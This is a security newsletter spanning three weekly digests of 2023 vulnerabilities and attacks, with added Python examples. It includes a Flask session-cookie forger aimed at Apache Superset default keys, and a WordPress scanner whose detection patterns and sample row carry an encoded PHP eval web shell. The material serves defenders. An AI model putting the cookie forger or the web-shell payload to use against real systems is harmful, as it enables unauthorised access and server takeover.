
Programmer’s Digest #30

04/26/2023-05/03/2023 New BGP Flaws, Apache Superset Vulnerability, Zyxel Firewall Devices Vulnerable And More

1. CISA Issues Advisory on Critical RCE Affecting ME RTU Remote Terminal Units

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released an Industrial Control Systems (ICS) advisory about a critical flaw affecting ME RTU remote terminal units. The vulnerability, tracked as CVE-2023-2131, carries the maximum CVSS score of 10.0, owing in part to its low attack complexity; successful exploitation could allow remote code execution. CISA has also urged organizations to adopt NIST guidance on identifying, assessing, and mitigating supply chain risks, and to enroll in the agency's free Vulnerability Scanning service to pinpoint vulnerable and high-risk devices.

2. Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software

Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers. The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source routing protocol suite for Linux and Unix platforms. FRRouting is embedded in products from several vendors, including NVIDIA Cumulus, DENT, and SONiC, so a bug in it propagates downstream as a supply chain risk. BGP is the gateway protocol used to exchange routing and reachability information between autonomous systems and to select the routes over which internet traffic is delivered. The three flaws (CVE-2022-40302, CVE-2022-40318, and CVE-2022-43681), each with a CVSS score of 6.5, are out-of-bounds reads triggered while processing malformed BGP OPEN messages, the first message exchanged when a session is established. A peer that can deliver such a message can take the BGP daemon down, dropping all BGP sessions and routing tables and leaving the peer unresponsive.
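As an added example (this is not FRRouting's code, and it does not reproduce the exact code paths of the three CVEs), here is a strict BGP OPEN parser in Python that checks every length field against the bytes actually present before slicing, which is the discipline whose absence produces the out-of-bounds reads described above. The sample messages, AS number and router ID are constructed.

```python
import struct

BGP_HEADER_LEN = 19          # 16-byte marker + 2-byte length + 1-byte type
BGP_OPEN = 1
OPT_PARAM_CAPABILITIES = 2   # optional parameter type from RFC 5492


class MalformedOpen(ValueError):
    """Raised instead of reading past the end of the buffer."""


def parse_capabilities(data: bytes) -> list:
    """Parse an RFC 5492 Capabilities parameter: a run of (code, length, value)
    triples. Each length is checked against the bytes that remain before the
    value is sliced, so an inflated length can never read outside `data`."""
    caps, pos = [], 0
    while pos < len(data):
        if pos + 2 > len(data):
            raise MalformedOpen("truncated capability header")
        code, clen = data[pos], data[pos + 1]
        pos += 2
        if pos + clen > len(data):
            raise MalformedOpen(f"capability {code} claims {clen} bytes, "
                                f"only {len(data) - pos} remain")
        caps.append((code, data[pos:pos + clen]))
        pos += clen
    return caps


def parse_open(msg: bytes) -> dict:
    """Strictly parse a BGP OPEN message (RFC 4271 section 4.2)."""
    if len(msg) < BGP_HEADER_LEN:
        raise MalformedOpen("message shorter than BGP header")
    if msg[:16] != b"\xff" * 16:
        raise MalformedOpen("bad marker")
    length, msg_type = struct.unpack("!HB", msg[16:19])
    if length != len(msg):
        raise MalformedOpen(f"length field {length} != {len(msg)} bytes received")
    if msg_type != BGP_OPEN:
        raise MalformedOpen(f"type {msg_type} is not OPEN")
    body = msg[BGP_HEADER_LEN:]
    if len(body) < 10:
        raise MalformedOpen("OPEN body shorter than its fixed fields")
    version, my_as, hold_time, bgp_id, opt_len = struct.unpack("!BHHIB", body[:10])
    opts = body[10:]
    if opt_len != len(opts):
        raise MalformedOpen(f"optional parameters length {opt_len} != {len(opts)} present")
    params, pos = [], 0
    while pos < len(opts):
        if pos + 2 > len(opts):
            raise MalformedOpen("truncated optional parameter header")
        ptype, plen = opts[pos], opts[pos + 1]
        pos += 2
        if pos + plen > len(opts):
            raise MalformedOpen("optional parameter overruns message")
        value = opts[pos:pos + plen]
        pos += plen
        if ptype == OPT_PARAM_CAPABILITIES:
            params.append(("capabilities", parse_capabilities(value)))
        else:
            params.append(("unknown", ptype, value))
    return {"version": version, "my_as": my_as, "hold_time": hold_time,
            "bgp_id": bgp_id, "params": params}


def build_open(my_as: int, hold_time: int, bgp_id: int, opt_params: bytes) -> bytes:
    """Build an OPEN around a raw optional-parameters blob (test helper)."""
    body = struct.pack("!BHHIB", 4, my_as, hold_time, bgp_id, len(opt_params)) + opt_params
    return b"\xff" * 16 + struct.pack("!HB", BGP_HEADER_LEN + len(body), BGP_OPEN) + body


# Constructed samples. A Capabilities parameter (type 2, 6 bytes) carrying one
# Multiprotocol capability (code 1, 4 bytes: AFI 1, reserved 0, SAFI 1).
GOOD_OPEN = build_open(65001, 180, 0xC0000201, bytes([2, 6, 1, 4, 0, 1, 0, 1]))
# Same message, but the capability claims 40 bytes when only 4 follow it.
BAD_OPEN = build_open(65001, 180, 0xC0000201, bytes([2, 6, 1, 40, 0, 1, 0, 1]))


def is_malformed(msg: bytes) -> bool:
    try:
        parse_open(msg)
        return False
    except MalformedOpen:
        return True


if __name__ == "__main__":
    print(parse_open(GOOD_OPEN))
    print("BAD_OPEN rejected:", is_malformed(BAD_OPEN))
```

The point is the order of operations: the length is compared with what remains and only then used as a slice bound. A parser that trusts the length field first and checks afterwards, or not at all, is exactly what a malformed OPEN exercises.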

3. Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected

Three high-severity vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) catalog: CVE-2023-1389, CVE-2021-45046, and CVE-2023-21839. CVE-2023-1389 is a command injection flaw in TP-Link Archer AX-21 routers that the Mirai botnet has been exploiting since April 11, 2023. CVE-2021-45046 is a remote code execution flaw in the Apache Log4j2 logging library, with evidence of exploitation attempts over the past 30 days. CVE-2023-21839 is an unspecified vulnerability in Oracle WebLogic Server that allows an attacker with network access over the T3 or IIOP protocols to gain unauthorized access to sensitive data. All three carry high CVSS scores and pose significant risk; apply the vendor patches promptly.

4. Zyxel Firewall Devices Vulnerable to Remote Code Execution Attacks — Patch Now

Zyxel has released patches for a critical security flaw in its firewall devices, tracked as CVE-2023-28771, that could lead to remote code execution. The vulnerability, rated 9.8 on the CVSS scale, was reported by researchers from TRAPA Security. It stems from "improper error message handling" in some firewall versions and lets an unauthenticated attacker execute OS commands remotely by sending forged packets to an affected device. Zyxel has also addressed a high-severity post-authentication command injection flaw in specific firewall versions that allowed authenticated attackers to run some OS commands remotely, along with five further high-severity vulnerabilities and one medium-severity bug in numerous firewall and access point models, which could result in code execution or a denial-of-service condition.

5. RTM Locker’s First Linux Ransomware Strain Targeting NAS and ESXi Hosts

The RTM Locker ransomware group has developed a new strain capable of infecting Linux machines, marking the group's first move onto Linux. According to a report by Uptycs, the malware is inspired by the leaked Babuk ransomware source code and encrypts files using a combination of asymmetric and symmetric encryption. RTM Locker was first identified by Trellix, which described its operators as a private ransomware-as-a-service (RaaS) provider that avoids high-profile targets in order to draw as little attention as possible. The Linux version targets ESXi hosts, terminating all virtual machines running on a compromised host before starting encryption, and uses pthreads to parallelize the encryption routine. The initial infection vector used to deliver the ransomware is unknown. After encryption, victims are told to contact the support team within 48 hours via Tox or risk having their data published.

6. Apache Superset Vulnerability: Insecure Default Configuration Exposes Servers to RCE Attacks

Apache Superset has released fixes for a vulnerability that could lead to remote code execution. Versions up to and including 2.0.1 are affected. The issue is an insecure default: Superset ships with a default SECRET_KEY value, and because that key is what signs the Flask session cookies, anyone who knows the default can forge a valid session for an internet-exposed installation and reach resources they are not authorized for. From there an attacker can gain remote code execution, steal credentials, and compromise data. Horizon3.ai's chief architect, Naveen Sunkavally, warns of "a dangerous default configuration in Apache Superset." Instances whose operators changed SECRET_KEY to a cryptographically secure random string are not affected. The vulnerability is tracked as CVE-2023-27524 and has a CVSS score of 8.9.
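Added example, not Superset's or Horizon3.ai's code: a standard-library re-implementation of the session-cookie signing scheme Flask uses (HMAC-SHA1 over the payload, keyed with HMAC-SHA1(SECRET_KEY, "cookie-session"), as itsdangerous does it), plus a check that reports whether a captured cookie was signed with one of a list of candidate keys. The candidate keys below are constructed placeholders; for a real assessment substitute the default values from the Superset sources and Docker images, and confirm the scheme against a cookie issued by a test instance before trusting a negative result. A positive match means any session, including an administrator's, can be forged with sign_session().

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Iterable, Optional

SESSION_SALT = b"cookie-session"   # Flask's salt for its session cookie signer


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _derive_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation, as configured by Flask: HMAC-SHA1(secret, salt)
    return hmac.new(secret_key, SESSION_SALT, hashlib.sha1).digest()


def sign_session(session: dict, secret_key: bytes, timestamp: Optional[int] = None) -> str:
    """Produce a Flask-style session cookie: [.]payload.timestamp.signature.
    A leading '.' marks a zlib-compressed payload, as in itsdangerous."""
    payload = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    body = b"." + _b64e(compressed) if len(compressed) < len(payload) - 1 else _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    value = body + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()


def decode_session(cookie: str) -> dict:
    """Read the payload without checking the signature: the cookie is signed,
    not encrypted, so anyone holding it can see what the session contains."""
    value, _, _sig = cookie.encode().rpartition(b".")
    body, _, _ts = value.rpartition(b".")
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(raw)


def key_that_signed(cookie: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the candidate SECRET_KEY whose signature matches the cookie, else None."""
    value, sep, sig_b64 = cookie.encode().rpartition(b".")
    if not sep:
        return None
    try:
        sig = _b64d(sig_b64)
    except ValueError:
        return None
    for key in candidates:
        expected = hmac.new(_derive_key(key), value, hashlib.sha1).digest()
        if hmac.compare_digest(expected, sig):
            return key
    return None


def generate_secret_key() -> str:
    """A replacement for SECRET_KEY in superset_config.py: 42 random bytes as
    url-safe base64, the same strength as `openssl rand -base64 42`."""
    return secrets.token_urlsafe(42)


# Constructed placeholders standing in for real default keys.
DEFAULT_KEYS = [b"CHANGE_ME_placeholder_default", b"example_default_key"]

if __name__ == "__main__":
    # Session keys such as _user_id are an assumption about what the app stores.
    forged = sign_session({"_user_id": "1"}, DEFAULT_KEYS[0])
    print("signed with a default key:", key_that_signed(forged, DEFAULT_KEYS))
    print("new SECRET_KEY =", generate_secret_key())
```

Two things to take from this: the signature protects integrity only, so the payload is readable by anyone, and the signature is only as secret as SECRET_KEY, so a default value shared across every installation is equivalent to no signature at all.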


Programmer’s Digest #29

04/20/2023-04/27/2023 Critical Patches for Workstation and Fusion Software, SLP Vulnerability, Exploit Released For PaperCut Flaw And More

1. VMware Releases Critical Patches for Workstation and Fusion Software

VMware has released updates to resolve multiple security flaws in its Workstation and Fusion software, the most critical of which could allow a local attacker to achieve code execution. The vulnerability, tracked as CVE-2023-20869 (CVSS score: 9.3), is a stack-based buffer overflow in the functionality for sharing host Bluetooth devices with the virtual machine. A malicious actor with local administrative privileges inside a virtual machine may exploit it to execute code as the virtual machine's VMX process on the host, that is, to escape the guest. VMware has also patched two further shortcomings: a local privilege escalation flaw in Fusion (CVE-2023-20871, CVSS score: 7.3) and an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation (CVE-2023-20872, CVSS score: 7.7). The former could let an attacker with read/write access to the host operating system obtain root access; the latter could result in arbitrary code execution.

2. New SLP Vulnerability Could Let Attackers Launch 2200x Powerful DDoS Attacks

Details have emerged about a high-severity security vulnerability in the Service Location Protocol (SLP) that could be weaponized to launch volumetric denial-of-service attacks. Attackers could leverage vulnerable instances to launch DoS amplification attacks with a factor as high as 2,200 times, potentially one of the largest amplification factors ever reported. The vulnerability, assigned CVE-2023-29552 (CVSS score: 8.6), is said to affect more than 2,000 organizations and over 54,000 SLP instances accessible over the internet. Exploitation lets an attacker use susceptible SLP instances as reflectors: spoofed requests carrying the target's address are sent to the reflectors, whose far larger replies overwhelm the target with bogus traffic. SLP should be disabled on systems directly reachable from the internet, or SLP traffic (UDP and TCP port 427) filtered at the perimeter; where SLP ships as part of a product, as it does in VMware ESXi, the vendor guidance is to upgrade to a supported release line that is not impacted by the vulnerability.
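Added example, not from the disclosure: detection logic in Python that pairs UDP traffic into port 427 with traffic back out of it, per reflector and peer, over constructed NetFlow-style records, and flags pairs whose outbound volume is both large and far out of proportion to what came in. The ratio and volume thresholds are tuning assumptions. Run over a real exporter's records it shows whether a host you operate is being used as an SLP reflector; the victim shows up as the "requester" because its address is spoofed on the inbound packets.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List

SLP_PORT = 427


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record, as a NetFlow/IPFIX exporter would emit."""
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    octets: int


# Constructed sample. 10.0.0.9 answers a normal SLP lookup; 198.51.100.20 is a
# reflector being used against 203.0.113.7 (the spoofed "requester") and
# 203.0.113.8 (for which the exporter saw no inbound requests at all).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", 40001, "10.0.0.9", SLP_PORT, "udp", 60),
    Flow("10.0.0.9", SLP_PORT, "10.0.0.5", 40001, "udp", 200),
    Flow("203.0.113.7", 53, "198.51.100.20", SLP_PORT, "udp", 2_900),
    Flow("198.51.100.20", SLP_PORT, "203.0.113.7", 53, "udp", 6_380_000),
    Flow("198.51.100.20", SLP_PORT, "203.0.113.8", 80, "udp", 150_000),
    Flow("10.0.0.5", 50000, "10.0.0.9", 443, "tcp", 900_000),   # unrelated traffic
]


def slp_reflection_report(flows: Iterable[Flow], min_ratio: float = 10.0,
                          min_out_octets: int = 100_000) -> List[dict]:
    """Sum bytes sent into UDP/427 and bytes sent back out of it for every
    (reflector, peer) pair and flag pairs whose outbound volume exceeds
    min_out_octets and is at least min_ratio times the inbound volume.
    Replies with no inbound counterpart get an infinite ratio: either the
    requests arrived by a path the exporter does not see, or the reflector is
    answering something it should not."""
    into_slp, out_of_slp = defaultdict(int), defaultdict(int)
    for f in flows:
        if f.proto != "udp":
            continue
        if f.dport == SLP_PORT:
            into_slp[(f.dst, f.src)] += f.octets       # key: (reflector, peer)
        elif f.sport == SLP_PORT:
            out_of_slp[(f.src, f.dst)] += f.octets
    report = []
    for (reflector, peer), out_octets in out_of_slp.items():
        in_octets = into_slp.get((reflector, peer), 0)
        ratio = out_octets / in_octets if in_octets else float("inf")
        if out_octets >= min_out_octets and ratio >= min_ratio:
            report.append({"reflector": reflector, "victim": peer,
                           "in_octets": in_octets, "out_octets": out_octets,
                           "amplification": round(ratio, 1)})
    return sorted(report, key=lambda r: r["out_octets"], reverse=True)


if __name__ == "__main__":
    for row in slp_reflection_report(SAMPLE_FLOWS):
        print(row)
```

The legitimate lookup (60 bytes in, 200 out) is ignored; the 2,200x pair and the reply-only pair are reported. Lower min_out_octets if you want to catch an attacker probing your host's amplification factor before the real attack starts.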

3. Ransomware Hackers Using AuKill Tool to Disable EDR Software Using BYOVD Attack

Threat actors are employing a previously undocumented "defense evasion tool" dubbed AuKill that disables endpoint detection and response (EDR) software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack. AuKill abuses an outdated version of the driver shipped with version 16.32 of the Microsoft utility Process Explorer to kill EDR processes before a backdoor or ransomware is deployed on the target system. The BYOVD technique relies on a legitimate, but out-of-date and exploitable, driver signed by Microsoft (or with a stolen or leaked certificate) to gain elevated privileges and turn off security mechanisms. Because the driver is validly signed, it passes Driver Signature Enforcement, the Windows safeguard that requires kernel-mode drivers to carry a valid signature before they are loaded; that check confirms who signed the driver, not whether it is free of bugs, so a signed-but-vulnerable driver hands the attacker kernel-level code execution.

4. Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites

Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign. The plugin in question is Eval PHP, released by a developer named flashpixx. It lets users insert PHP code into the pages and posts of a WordPress site, and that code is executed every time the post is rendered in a web browser. GoDaddy's Sucuri found that infected websites had malicious code injected into the "wp_posts" table, which stores posts, pages, and navigation menus. The injected code writes a PHP script containing a remote code execution backdoor to disk using the file_put_contents function. Sucuri detected over 6,000 instances of this backdoor in the last six months, originating from three Russian IP addresses. The attackers established persistence by misusing the Eval PHP plugin to save rogue pages as drafts, which never appear on the public site. The rogue pages were created with a legitimate site administrator as the author, suggesting a successful login as a privileged user. Because the plugin executes PHP inside shortcodes, the attackers could reinfect the website at will while staying hidden.

Recommendation
Site owners are advised to lock down the WP Admin dashboard and watch for suspicious logins: the attackers needed administrator access both to install the plugin and to author the rogue drafts.
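Added example, not Sucuri's tooling: a Python scan over rows in the shape of wp_posts that finds the plugin's [evalphp] shortcodes, flags PHP inside them that writes files, decodes payloads or reads request parameters, decodes any base64 literal to inspect the file being dropped, and flags drafts containing the shortcode outright, since that is where the campaign hid its code. The rows are constructed; in production you would feed it the output of a SELECT over wp_posts.

```python
import base64
import re
from dataclasses import dataclass
from typing import Iterable, List

# The plugin's shortcode; whatever sits between the tags is executed as PHP.
EVALPHP = re.compile(r"\[evalphp\](.*?)\[/evalphp\]", re.IGNORECASE | re.DOTALL)
SUSPICIOUS_CALLS = re.compile(
    r"\b(file_put_contents|eval|assert|base64_decode|gzinflate|str_rot13|"
    r"system|shell_exec|passthru|exec)\s*\(", re.IGNORECASE)
SUPERGLOBALS = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


@dataclass
class Post:
    """The wp_posts columns the scan needs."""
    ID: int
    post_author: str
    post_status: str
    post_type: str
    post_content: str


def _indicators(php: str) -> set:
    calls = {m.lower() for m in SUSPICIOUS_CALLS.findall(php)}
    return calls | set(SUPERGLOBALS.findall(php))


def scan_posts(posts: Iterable[Post]) -> List[dict]:
    """Return one finding per post whose [evalphp] blocks look like a dropper
    or a shell. Drafts with any shortcode are reported regardless: a published
    page may legitimately use the plugin, a never-published draft has no reason
    to, yet its code still runs when the draft is requested."""
    findings = []
    for p in posts:
        blocks = [m.group(1) for m in EVALPHP.finditer(p.post_content)]
        if not blocks:
            continue
        indicators, decoded = set(), []
        for php in blocks:
            indicators |= _indicators(php)
            for lit in B64_LITERAL.findall(php):
                try:
                    inner = base64.b64decode(lit, validate=True).decode("utf-8", "replace")
                except ValueError:
                    continue
                decoded.append(inner)
                indicators |= _indicators(inner)   # inspect the dropped file too
        if indicators or p.post_status == "draft":
            findings.append({"post_id": p.ID, "author": p.post_author,
                             "status": p.post_status, "type": p.post_type,
                             "indicators": sorted(indicators),
                             "decoded_payloads": decoded})
    return findings


# Constructed rows. Post 14 mirrors the campaign: a draft page, authored as the
# admin, whose shortcode writes a one-line eval() shell into the uploads folder.
SAMPLE_POSTS = [
    Post(12, "admin", "publish", "page", "<p>Welcome to the site.</p>"),
    Post(13, "admin", "publish", "post", "[evalphp]echo date('Y');[/evalphp]"),
    Post(14, "admin", "draft", "page",
         "[evalphp]file_put_contents('wp-content/uploads/.x.php', "
         "base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7'));[/evalphp]"),
]

if __name__ == "__main__":
    for finding in scan_posts(SAMPLE_POSTS):
        print(finding)
```

The benign published use in post 13 is not reported; post 14 is, with both the dropper call and the decoded payload's eval() over $_POST listed as indicators. Remember to check the uploads directory (and anywhere else file_put_contents pointed) for the dropped file as well, since removing the draft does not remove the shell.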

5. CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerabilities are:

  • CVE-2023-28432, a MinIO information disclosure vulnerability.
  • CVE-2023-27350, an improper access control vulnerability in PaperCut MF/NG.
  • CVE-2023-2136, a Google Chrome Skia integer overflow vulnerability.

MinIO's maintainers said the information disclosure flaw returned all environment variables in a cluster deployment, which in practice means the root credentials passed to MinIO through its environment. As many as 18 unique malicious IP addresses from five countries attempted to exploit the flaw over the past 30 days. Threat intelligence firm GreyNoise also noted that an older MinIO version vulnerable to CVE-2023-28432 was being used in a reference implementation provided by OpenAI for developers integrating their plugins with ChatGPT. PaperCut, for its part, has patched CVE-2023-27350 in its MF and NG print management software (see item 7 below).

6. Two Critical Flaws Found in Alibaba Cloud’s PostgreSQL Databases

A chain of two critical flaws has been disclosed in Alibaba Cloud's ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation and access sensitive data belonging to other customers. In a nutshell, the vulnerabilities (a privilege escalation flaw in AnalyticDB and a remote code execution bug in ApsaraDB RDS) made it possible to elevate privileges to root within the database container, escape to the underlying Kubernetes node, and ultimately obtain unauthorized access to the Kubernetes API server. Armed with that access, an attacker could retrieve the container registry credentials from the API server and push a malicious image: a supply chain attack on both database services that would hand over control of customer databases belonging to other tenants on the shared node.

7. Exploit Released For PaperCut Flaw Abused To Hijack Servers

Attackers are exploiting severe vulnerabilities in the widely used PaperCut MF/NG print management software, installing the Atera remote management software to take over servers.
The software's developer says it is used by more than 100 million users at over 70,000 companies worldwide.
The two security flaws, CVE-2023-27350 and CVE-2023-27351, allow remote attackers to bypass authentication; the former permits arbitrary code execution on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that require no user interaction, while the latter exposes user information.
Both vulnerabilities are fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later; upgrading to one of these fixed versions is recommended.


Programmer’s Digest #28

04/13/2023-04/19/2023 Critical Flaws in vm2 JavaScript Library, APT41’s Use of Open Source GC2 Tool, Kodi Confirms Data Breach And More

1. Critical Flaws in vm2 JavaScript Library Can Lead to Remote Code Execution 

A fresh round of patches has been made available for the vm2 JavaScript library to address two critical flaws that could be exploited to break out of the sandbox. Both flaws, CVE-2023-29199 and CVE-2023-30547, are rated 9.8 out of 10 on the CVSS scale and are fixed in versions 3.9.16 and 3.9.17, respectively. Both allow an attacker to raise an unsanitized host exception; successfully exploited, that lets sandboxed code escape the sandbox and run arbitrary code in the host context. The disclosure comes a little over a week after vm2 remediated another sandbox escape flaw (CVE-2023-29017, CVSS score: 9.8) that could likewise lead to the execution of arbitrary code on the underlying system.

2. Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites

A Chinese nation-state group targeted an unnamed Taiwanese media organization with an open source red teaming tool known as Google Command and Control (GC2), amid broader abuse of Google's infrastructure for malicious ends. Google's Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geology-themed moniker HOODOO. The attack starts with a phishing email containing a link to a password-protected file hosted on Google Drive, which in turn carries the Go-based GC2 tool. Once installed on the victim machine, GC2 polls a Google Sheet for attacker commands, exfiltrates data to Google Drive, and can download additional files from Drive onto the victim system.

3. Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, the first such bug addressed since the start of the year. Tracked as CVE-2023-2033, the high-severity vulnerability is a type confusion issue in the V8 JavaScript engine: type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. Google acknowledged that "an exploit for CVE-2023-2033 exists in the wild," but stopped short of sharing technical specifics or indicators of compromise (IoCs) so as not to aid further exploitation.

Recommendation
Users should upgrade to version 112.0.5615.121 for Windows, macOS, and Linux. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi should apply the corresponding fixes as they become available.

4. Vice Society Ransomware Using Stealthy PowerShell Tool for Data Exfiltration

Threat actors associated with the Vice Society ransomware gang have been observed using a bespoke PowerShell-based tool to stay under the radar and automate the exfiltration of data from compromised networks. Built-in exfiltration methods such as living-off-the-land binaries and scripts remove the need to bring in external tools that might be flagged by security software or by human analysts, and they blend into the normal operating environment. The PowerShell script discovered by Unit 42 (w1.ps1) identifies the mounted drives on a system and then recursively walks each root directory, exfiltrating the data it finds over HTTP. It applies exclusion criteria that filter out system files, backups, and folders belonging to web browsers and to security products from Symantec, ESET, and Sophos. The script is a further illustration of double extortion in the ransomware landscape and a reminder for organizations to maintain robust protections and keep watching for evolving techniques.

5. Kodi Confirms Data Breach: 400K User Records and Private Messages Stolen

Kodi, the open source media player project, has confirmed a data breach following a cyber attack. Threat actors stole user data and private messages from the project's MyBB forum database and attempted to sell the dump on a cybercrime marketplace. They also created database backups, which they downloaded and then deleted. The account the threat actors used has been disabled, and Kodi has taken the forum down while it commissions a new server. The project emphasized that there is no evidence of unauthorized access to the server hosting the MyBB software itself. The breach affected 400,635 users, whose forum posts, messages, and personal information were exposed. Kodi plans to redeploy the forum on the latest MyBB release.

6. New Python-Based “Legion” Hacking Tool Emerges on Telegram

Legion, a Python-based credential harvester and hacking tool, is being marketed on Telegram as a way for cybercriminals to break into online services for further exploitation. The malware includes modules to exploit unpatched Apache versions, conduct remote code execution attacks, and brute-force cPanel and WebHost Manager accounts. It targets web servers running content management systems, PHP, or PHP-based frameworks such as Laravel. The primary goal is to hijack those services and weaponize the infrastructure for follow-on attacks, including mass spam and opportunistic phishing campaigns. Legion also harvests AWS credentials from insecure or misconfigured web servers and sends SMS spam to users of US mobile networks. The origins of the threat actor remain unknown.

7. Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog on the basis of active exploitation. The first, CVE-2023-20963, is an Android Framework privilege escalation vulnerability with a CVSS score of 7.8; Google has acknowledged that it may be under limited, targeted exploitation. The second, CVE-2023-29492, is an insecure deserialization vulnerability in Novi Survey software that lets an attacker execute code remotely on the server. The software provider addressed it earlier this week. The development follows reports that Android apps from Chinese e-commerce company Pinduoduo were weaponized to exploit CVE-2023-20963 as a zero-day, stealing data and taking control of devices. Google suspended Pinduoduo's official app from the Play Store in March after identifying malware in off-Play versions of the software.
